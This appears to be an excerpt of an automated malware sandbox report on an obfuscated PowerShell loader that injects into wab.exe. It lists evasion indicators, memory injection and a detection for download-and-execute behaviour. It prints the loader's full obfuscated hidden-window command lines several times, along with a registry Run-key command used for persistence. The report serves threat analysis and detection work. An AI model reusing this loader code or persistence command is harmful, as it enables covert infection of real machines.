            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 84A9764
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4898Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4983Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5605Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4171Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 605Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 5605 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 4171 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1888Thread sleep count: 605 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: powershell.exe, 00000002.00000002.2624656540.0000018D628E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll L
            Source: wab.exe, 0000000A.00000002.2408112651.0000000008BE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_3_08C31AC6 LdrInitializeThunk,10_3_08C31AC6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: amsi64_6716.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3210000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FDFA54Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.in ddse.rdltover.ori,sdi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "scleroconjunctival" /t reg_expand_sz /d "%ulykkesfugles% -w 1 $cigaretetuiernes=(get-itemproperty -path 'hkcu:\indfindendes\').storborgernes;%ulykkesfugles% ($cigaretetuiernes)"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.in ddse.rdltover.ori,sdiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe 